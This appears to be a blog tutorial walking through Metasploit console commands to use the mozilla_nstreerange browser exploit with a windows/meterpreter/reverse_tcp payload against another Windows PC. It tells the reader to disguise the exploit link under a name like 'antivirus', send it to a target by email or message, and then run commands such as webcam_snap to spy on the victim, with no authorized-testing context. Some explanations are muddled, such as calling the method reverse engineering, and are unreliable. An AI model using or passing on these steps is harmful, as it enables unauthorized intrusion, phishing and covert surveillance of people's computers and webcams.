Remote(METERPRETER) access in WINDOWS through METASPLOIT console

Hi Friends,

Today I am going to show that how can we access another PC (Windows PC) through METASPLOIT 

Metasploit is an good penetration testing tool but as we know we can apply REVERSE ENGINEERING to do so….. so first of all you might have installed latest version of METASPLOIT in your Windows system to access another one

NOTICE

This method work very well to access Windows XP but to access any another earlier  Windows OS requirement are

  • already installed latest JAVA version in the TARGET system
  • Any Browser installed in YOUR system, for this method I am using Mozilla plugins so you must have Mozilla Firefox installed in YOUR system for this method
  • Target system must be connected to Internet and that’s all…..now the game begins……… 

( 1 )

Start  ->  All Programs -> Metasploit  ->  Metasploit Console 

– Now wait until Console load properly like thisImage

– so now when the console is ready then we will go to our second section

( 2 )

msf >  use exploit/windows/browser/mozilla_nstreerange

– This command is to use EXPLOIT command to use specific file accessing just like we are using Mozilla Firefox Browser’s plugins. After applying this command you’ll be hereImage

( 3 )

> show options

Image– This step was to check is every option as shown in image is almost same to be continue 

( 4 )

> set srvhost ” your current IP “

> set set srvport ” any open port “

> set uripath ” any name or anything text “

> set payload windows/meterpreter/reverse_tcp

> set lhost ” Your current IP “

– You can find your current IP (Which changes every time you connect to Internet connection) from this site http://www.whatismyip.com/

– here SRVPOST is any open port in your system. generally you can use 8080, 443, 80, 4444 etc.

– set URIPATH for his field you can use your name or any other text to just make an link which we are going to give to our TARGET system by E-mail or Message or whatever way your like but for now we will discuss this topic in deep after following step 

– copy and run this command as shown above “set payload windows/meterpreter/reverse_tcp”

– and in next command use your IP againImage

 – now after completing all this we are on the our last and MY FAVORITE command

( 5 )

 > exploit

– After applying this command you’ll get the message like your server is startedImage

 – now you’ll get message like this “server started through URL……….” now the next step is to provide your server address (link) to your friend means your TARGET PC here the link is shown above in red box.

– My Link is 

http://192.168.8.91:80/antivirus

– but you will not get the same link address as show above but you’ll get

http:/”your IP”:”open port which you set in 4’th step”/”uripath which you set in 4’th step”

– I used URIPATH “king_hacker” but in this last image I have changed to ” antivirus ” so now you made the link as shown above and send it to your TARGET PC 

– Now once your TARGET PC will click on this link, all meterpreter files will be sent to that PC and VOILA………………….!

– Now you have METERPRETER ACCESS TO TARGET PC and you can use different commands to that PC for action…. ! like

> getuid (to get all details about system )

> webcam_snap (to get webcam snapshot from TARGETED system)

Leave a comment